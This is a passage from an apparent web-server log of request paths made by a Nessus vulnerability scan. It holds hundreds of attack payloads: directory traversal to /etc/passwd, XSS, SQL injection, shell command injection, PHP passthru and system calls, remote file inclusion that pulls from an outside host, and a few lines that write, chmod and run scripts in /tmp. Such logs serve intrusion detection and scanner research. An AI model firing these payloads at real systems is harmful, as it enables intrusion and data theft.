0,129517196,0,0,0,0,0--\n/scripts/bveygnpo6hkw.html\n/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_3gocdeon]));die;/*\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/vsnlklmgzu0;echo|awstats623172.txt\n/javascript/favorites.exe\n/6n7aacgg.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0drm q43695626 #\n/javascript/company.exe\n/ows-bin/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/jnt3f86c.x?<script>document.cookie=\"testcmax=9270;\"</script>\n/scripts/index.php?board=nonexistant1270483518\n/scripts/fgos1sb1c1tr.cfm\n/main.php?stuff=\"ping -w 7000 -n 1 4.3.2.1|rem \n/javascript/.htpasswd.sfish/sfish>'>\"></sfish><sfish>\n/examples/jsp/jsp2/jspx/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/phpmyadmin/documentation.html?phpmyadmin=;cat /etc/passwd;\n/examples/jsp/num/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/?\\\"><script>alert('vulnerable');</script>\n/javascript/skin.exe\n/main.php?stuff=\"\\x0arm\\x09q95586715\\x09#\n/javascript/sendto.exe\n/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/help.php?q=\"&ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/help.php?q=\"&rm\\x09q27972468&rem\\x09\n/scripts/wiki/rankings.php\n/if69ddo1.pl?<script>document.cookie=\"testiabz=5220;\"</script>\n/javascript/matt.exe\n/en-us/hipkz026.cgi?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/webcgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/i686v90l.aspx?<script>document.cookie=\"testfutf=1550;\"</script>\n/cgi-915/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/main.php?stuff=\"&ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/v3axg1p8.asp?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/scripts/admin/login.html\n/dda2qr7j.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgibin/testcgi.exe\n/en-us/account/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/apavxugx.php?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/m-scriptz/\n/phpmyadmin/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/scripts/starnet/addons/slideshow_full.php?album_name='1283310915\n/7uz3ok60.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/edzaia0i.x?<script>cross_site_scripting.nasl</script>\n/vac1l5vm.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/vir0v3xfc?\n/scripts/wspd_cgi.sh/wservice=wsbroker1/webtools/oscommand.w\n/manager/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/scripts/rvckwz6smkqf.html\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1974863202,2,2009798962,4,5,6,7,8,9,0,1,2,3 --\n/javascript/unlock.exe\n/s7qus4g3.php?<script>cross_site_scripting.nasl</script>\n/lib/scripts/jquery/jquery-ui-theme/images/ui-bg_flat_75_ffffff_40x100.png\n/page/1,10966,,00.html?var=<script>alert('vulnerable')</script>\n/scripts/lrn28issfuqi.inc\n/javascript/transaction.exe\n/examples/jsp/error/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/cgi-bin/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/o6ebbirj.pl?<script>cross_site_scripting.nasl</script>\n/scs86g1p.php?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/ao22ww7y.pl?<script>document.cookie=\"testqppc=8767;\"</script>\n/examples/jsp/cal/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/en-us/account/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/scripts/2sfdqydfaknx.cgi\n/en-us/esmozg5d.fts?<script>cross_site_scripting.nasl</script>\n/cgibin/.htpasswd\n/examples/jsp/jsp2/el/view_user.php?list=1&letter=&sort_by='select\n/xfkun1ku.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/examples/jsp/error/phptonuke.php?filnavn=/etc/passwd\n/mpcgi/vssetcookie.exe\n/help.php?q=\"&ver,>q66241785&rem,\n/yef5f3d5.exe?<script>document.cookie=\"testcrcv=6167;\"</script>\n/exchange/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/phpmyadmin/index.php?page=/etc/passwd\\x00\n/slideshow.php?name=\"><script>alert(413906083535);</script>\n/help.php?q=\"ping;-w;10000;-n;1;1.2.3.4&rem;\n/cgi.cgi/gw5/gwweb.exe?help=bad-request\n/top.php?stuff=\"ping,-w,10000,-n,1,4.3.2.1|rem,\n/?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/cgi-bin/doc/index.php?s=/etc/passwd\\x00\n/7o5qp766.x?<script>cross_site_scripting.nasl</script>\n/recordings/search.php?submit=true&search=');\n/6n7aacgg.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/llumt7msyau5y?\\x00\n/en-us/dda2qr7j.idc?<script>cross_site_scripting.nasl</script>\n/aj3pf49c.jsp?<script>document.cookie=\"testnofv=4170;\"</script>\n/ghswfouu.idc?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/scripts/msmmask.exe?mask=/junk334\n/examples/jsp/cal/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/manager/index.php?configfile=../../../../../../../../../etc/passwd\n/cgi-bin/sendtemp.pl?templ=../../../../../etc/passwd\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\n/project_description/\n/help.php?q=&ver\\x09>q15757572&rem\\x09\n/iajtej82.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jnv890lt.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/bl8sefdm.exe?<script>cross_site_scripting.nasl</script>\n/u95h6ymu.jspa?<script>document.cookie=\"testkhwc=4028;\"</script>\n/en-us/33y9gcqq.cfm?<script>document.cookie=\"testnvxc=4301;\"</script>\n/examples/jsp/sessions/admin/top.php?admindir=/etc/passwd\\x00\n/examples/jsp/sessions/core/api.php?t_path_core=/etc/passwd\\x00\n/scripts/qbch5ojumj32.shtml\n/javascript/intranet.exe\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.mscgi\n/space1105xss_145/\n/javascript/solve.exe\n/jnv890lt.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/vac1l5vm.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/vir0v3xfc?\\x00\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc/passwd\n/javascript/weblog.exe\n/en-us/h5sc3gxy.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/d7ktpmcq.php?<script>cross_site_scripting.nasl</script>\n/ectpasswd/\n/primalscript/\n/scripts/nimages.php\n/phpmyadmin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/.../.../.../.../.../.../.../.../.../boot.ini\n/en-us/account/pfdispaly?../../../../../../etc/passwd\n/help.php?q=\"uname >q92991511 #\n/zln2hm2z.idc?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/examples/jsp/checkbox/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/3m5knyc4.asp?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/en-us/account/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/openview5.exe?target=main&action=../../../../../../../../../..//windows/win.ini\n/top.php?stuff=\"rm\\xa0q56682636&rem\\xa0\n/igtf0zon.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0auname >q54187211 #\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc/passwd\\x00.html\n/main.php?logout=\"rm q41454446&rem \n/j4rdyhw8.mscgi?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/d765w06j.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/networking.exe\n/phpmyadmin/top.php?header=../../../../../../../../etc/passwd\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/ghl9il??\n/en-us/account/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/en-us/account/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/examples/jsp/jsp2/jspx/faq.php?action=&type=view&s=&id=-1' union select 0,1938145887,0,0,0,0,0--\n/hjdzm96v.exe?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/phpmyadmin//../../../../../../../../windows/win.ini\\x00\n/subscriptions.cfg\n/examples/jsp/num/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/cgi-win/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/j4drbkil.x?<script>cross_site_scripting.nasl</script>\n/cgibin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n<script>document.cookie=\"testfuqi=4189;\"</script>\n/javascript/nul.exe\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1736489965--\n/top.php?stuff=\"&ver\\x09>q43482464&rem\\x09\n/zqqemp6j.nsf?<script>cross_site_scripting.nasl</script>\n/script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/javascript/jacob.exe\n/top.php?stuff='\\x0dsleep 9 #\n/vac1l5vm.htm?<script>cross_site_scripting.nasl</script>\n/static//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd\n/en-us/account/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/scripts/search.jsp?q=%\"<script>alert(1331904224)</script>\n/azcrfs8d.asp?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/qhvu0pdg.cfc?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/main.php?stuff=';del q74863224 #\n/javascript/document.bak\n/en-us/n9xlumt5.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&rm\\x0bq71858742&rem\\x0b\n/...\\...\\...\\...\\...\\...\\...\\...\\...\\winnt\\win.ini\n/vac1l5vm.php?<script>cross_site_scripting.nasl</script>\n/sawmill6cl.exe?ho+{complete_version}\n/examples/servlets/servlet/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/javascript/document.pl\n/javascript/site.exe\n/en-us/account/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/j4rdyhw8.jspa?<script>document.cookie=\"testrluj=1420;\"</script>\nftp://192.168.25.102/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/phpmyadmin/index.php?id=urjhxcl19w'\n/i7prbs22.jsp?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/listrec.pl?app=qmh-news&template=;ls /etc|\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/cgeqvnsxdv.sh+>+/dev/null+&'); function v\n/cgscripts/\n/ybz5rz7a.idc?<script>document.cookie=\"testsbvw=6289;\"</script>\n/help.php?q=ver;>q21957336&rem;\n/phpmyadmin/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/xfkun1ku.html?<script>cross_site_scripting.nasl</script>\n/subscriptions.error\n/cacti/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/examples/jsp/sessions/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/e9rx3ya4.x?<script>cross_site_scripting.nasl</script>\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/txenjrxf3?&\n/cgi-bin/profile.asp?handle=foo'\n/top.php?stuff=\"ver\\x0c>q97119121&rem\\x0c\n/scripts/forumdisplay.php?fid=21\"><script>x</script>\n/if69ddo1.nsf?<script>document.cookie=\"testiabz=5220;\"</script>\n/main.php?stuff=\";rm q18895618 #\n/scripts/event_view.php?eid=34 union select 1255940005\n/top.php?stuff=\"&rm,q96325278&rem,\n/ywaxntrx.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/0z575z74.do?<script>document.cookie=\"testuhsv=9753;\"</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/ebkkxjvdvd.sh+>+/dev/null+&').\"]=1\n/help.php?q=\"ping -w 8000 -n 1 4.3.2.1|rem \n/javascript/automation.exe\n/edzaia0i.exe?<script>cross_site_scripting.nasl</script>\n/t578vqea.cgi?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/examples/jsp/checkbox/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/javascript/document.ws\n/cacti/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/5qnlm5z2.cgi?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/script//ident/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/checkbox/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/javascript/trackback.exe\n/javascript/was.exe\n/scripts/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/family_law_and_children's_rights/\n/examples/jsp/jsp2/el/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=&ping;-w;9000;-n;1;1.2.3.4&rem;\n/if69ddo1.idc?<script>document.cookie=\"testiabz=5220;\"</script>\n/apache.php?command=c:\\lockout_install.exe\n/recordings/index.php?src=1&_common=1&time=1331919010&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/recordings/index.php?template=../../../loudblog/custom/config.php\\x00\n/help.php?q=&uname >q14992919 #\n/en-us/account/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=id\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/btgjhjkaao.sh'); function v\n/ghswfouu.x?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/main.inc.php?pathtoscript=http://192.168.202.118:8080/2aibfaczmac8?\n/b1q8bywu.do?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/cacti/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'--\n/javascript/.htaccess/\"`false`\"\n/javascript/menus.exe\n/fc9t54l7.mscgi?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/scripts/cdjnwtwnqga1.php\n/0qhcnefz.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"del q96673282 #\n/fnwhrxyd.jspa?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&ping,-w,8000,-n,1,1.2.3.4&rem,\n/yomo-'the beginning' mixtape/\n/ju0u7kfo.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mylog.html?screen=/etc/passwd\n/examples/jsp/cal/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/snippetmaster/includes/vars.inc.php?_session[script_path]=@rfiurl?_session[script_path]=@rfiurl?\n/n1afe1y6.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6wb70v0b.cfm?<script>cross_site_scripting.nasl</script>\n/user's_faq/\n/src/scripture.php?pageheaderfile=http://192.168.202.96:8080/4dckqcc0acprbz??\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+q+>>ctdn\n/scripts/qop0sa1auif9.html\n/linux-scripts/\n/main.php?stuff=\"&ver\\xa0>q28776765&rem\\xa0\n/javascript/index_1.exe\n/javascript/product.exe\n/examples/jsp/error/index.php?id=0rop9yeuxw'\n<script>document.cookie=\"testmybc=2088;\"</script>\n/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/javascript/htpasswd.db\n/examples/jsp/error/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_qshknabc]));die;/*\n/tuwjta1w.nsf?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/examples/servlets/servlet/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/cgi-home/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/order/login.php?svr_rootscript=http://192.168.202.96:8080/4dckqcc0acprbz?\n/top.php?stuff='&rm\\x09q76524279\\x09#\n/main.php?stuff=\"|ping;-w;7000;-n;1;4.3.2.1|rem;\n/examples/jsp/cal/index.php?template=../../../loudblog/custom/config.php\\x00\n/33y9gcqq.html?<script>document.cookie=\"testnvxc=4301;\"</script>\n/manager/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/scripts/callboth.php?seq=654321&out=123456&in=1331908862@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/h21y8w52.asp?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"|sleep 9 #\n/cgi-bin/sawmill5?rfcf+\"/etc/passwd\"+spbn+1,1,21,1,1,1,1\n/javascript/icons.exe\n/y8pmygrp.php3?<script>cross_site_scripting.nasl</script>\n/cacti/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/scripts/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/examples/jsp/error/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.htm\nindex.html?../../../../../boot.ini\n/scripts/wxrdqnkjuwmu.pl\n/webdav/phprun.php?cmd=dir c:'\n/examples/jsp/error/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/examples/servlets/servlet/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/main.php?stuff=\"&ver\\x0c>q27346825&rem\\x0c\n/activeauctionsuperstore/iteminfo.asp?itemid=42'\n/scripts/index.php?id='union/**/select/**/0,0,217622241,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/cacti/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/l13b77e5.nsf?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/necro - morbid 12'/\n/3m5knyc4.cgi?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/b5xdqgz2.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/7o5qp766.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"uname >q83491369 #\n/sutherland-manuscript/\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/wrkvkjjzem0;echo|awstats138644.txt\n/e9rx3ya4.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m2fpztty.exe?<script>cross_site_scripting.nasl</script>\n/b4vng02k.exe?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/606wkcop.aspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/help.php?q=\"rm,q74835818&rem,\n/cgi-bin/htimage.exe/path/filename?2,2\n/u8yiqilu.htm?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/fa8p8lr8.mscgi?<script>cross_site_scripting.nasl</script>\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/swgnhpydbq0t?\n/main.php?frm_daynight=q96287594&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=\n/cgibin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/help.php?q=\"&ping,-w,10000,-n,1,1.2.3.4&rem,\n/help.php?q=\"\\x0arm q51358327 #\n/examples/jsp/cal/base_qry_common.php?base_path=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/en-us/w4996nr0.htm?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/colors/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/v3axg1p8.exe?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/mpcgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/um7xpn15.php3?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/top.php?stuff='rm q76482731 #\n/help.php?q=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/top.php?stuff='\\x0dsleep\\x099\\x09#\n/cgi/cgi-test.exe\n/0,2997,s=1626&amp;a=12703,00/\n/webcgi/testcgi.exe\n/cgi-home/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/phpmyadmin/lang/index.php?file=/etc/passwd\n/examples/servlets/servlet/calendar_admin.pl?config=|cat /etc/passwd|\n/news/include/createdb.php?langfile;=http://192.168.202.96:8080/4dckqcc0acprbz??\n/she's so blonde/\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332009306\n/fmnveedu.kspx?<script>document.cookie=\"testgfbr=7014;\"</script>\n/?<script>document.cookie=\"testcmax=9270;\"</script>\n/javascript/credits.exe\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/djjeroppey.sh+>+/dev/null+&'); function v\n/images_descriptions/\n/g8nu2yy7.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/index.php?template=../../../loudblog/custom/config.php\\x00\n/jnv890lt.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/site/' union all select filetoclob('/etc/passwd','server')::html,0 from sysusers where username = user --/.html\n/women's health/\n/en-us/account/index.php?p='nessus\n/help.php?q=\"uname >q82754698 #\n/daddy's worst nightmare 4/\n/<script>document.cookie=\"testknim=9383;\"</script>\n/forum-ra.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\n/examples/jsp/num/index.php?template=../../../loudblog/custom/config.php\\x00\n/javascript/guests.exe\n/help.php?q=\"&uname\\x09>q13287114\\x09#\n/cacti/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/help.php?q=\"&del\\xa0q49941678&rem\\xa0\n/en-us/w4996nr0.pl?<script>document.cookie=\"testttvs=7163;\"</script>\n/zv8tv7h8.jspa?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/t578vqea.dll?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/scripts/shop.plx/page=nessus59680014\n/help.php?q=ping;-w;8000;-n;1;1.2.3.4&rem;\n/javascript/directories.exe\n/examples/jsp/sessions/smpwservicescgi.exe\n/scripts/shop.plx/page=nessus244507043\n/cacti/smpwservicescgi.exe\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\\x00\n/subscriptionrenewal/\n/main.php?logout=ping;-w;9000;-n;1;4.3.2.1&rem;\n/rv98iwjp.fts?<script>cross_site_scripting.nasl</script>\n/vmi8bb12.htm?<script>document.cookie=\"testlerc=2575;\"</script>\n/examples/jsp/cal/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/javascript/skins.exe\n/zv8tv7h8.jspa?<script>document.cookie=\"testcqwz=9752;\"</script>\n/examples/jsp/cal/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/mv8wxfy9.mscgi?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/aoy7kzbh.exe|dir\n/phpmyadmin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/index.php/\\\"><script><script>alert(document.cookie)</script><\n/en-us/oie504mr.kspx?<script>document.cookie=\"testtpby=7052;\"</script>\n/examples/jsp/checkbox/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/w4996nr0.do?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/jsp2/el/perl.exe?-v\n/fnwhrxyd.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-exe/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/descriptor-objects/\n//q59551631&#x26;q2217&#x22;q2217&#x3c;q2217&#x3e;q59551631\n/y8pmygrp.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/bboard.exe\n/examples/jsp/sessions/simple/view_page?mv_arg=|cat /etc/passwd|\n/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/v3axg1p8.html?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/cgi-sys/.passwd\n/hipkz026.do?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/ht8pn8uq.cgi?<script>cross_site_scripting.nasl</script>\n/cgi-bin/viewpage.php?file=/etc/passwd\n/q703m78q.fts?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/ju0u7kfo.pl?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/mapserv.exe?map=mapserver_detect.nasl.map\n/ygkjkngd.htm?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/javascript/.bash_history.exe\n/javascript/htpasswd.temp\n/j2kdmfw4.php3?<script>cross_site_scripting.nasl</script>\n/u8yiqilu.nsf?<script>document.cookie=\"testswjp=6010;\"</script>\n/jscript4/\n/cgis/gw5/gwweb.exe?help=bad-request\n/help.php?q='&uname\\x09>q61993923\\x09#\n/scripts/base_maintenance.php\n/1qwv2p5p.aspx?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/examples/jsp/jsp2/el/index.php?post=../config/password\n/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/javascript/computing.exe\n/vhzmaia2.aspx?<script>document.cookie=\"testkogj=3979;\"</script>\n/<script>document.cookie=\"testiklc=904;\"</script>\n/cgi-sys/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/cgi-915/.htpasswd\n/scriptv0106437/\n/?<script>document.cookie=\"testtrlh=3672;\"</script>\n/qhvu0pdg.nsf?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/<script>cross_site_scripting.nasl</script>.aspx\n/5o9zq43e.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t578vqea.cfc?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/um7xpn15.cfm?<script>document.cookie=\"testotoy=6142;\"</script>\n/b1q8bywu.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jw64yq8u.cfc?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/top.php?stuff='del\\x09q19246858\\x09#\n/examples/jsp/error/smpwservicescgi.exe\n/javascript/commercial.exe\n/e9rx3ya4.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/egaet53a.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/javascript/ejb.exe\n/cacti/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/scripts/smb2www.pl\n/scripts/shops/sub.asp?isub=dupaypal_sql_injections.nasl'\n/b5xdqgz2.htm?<img 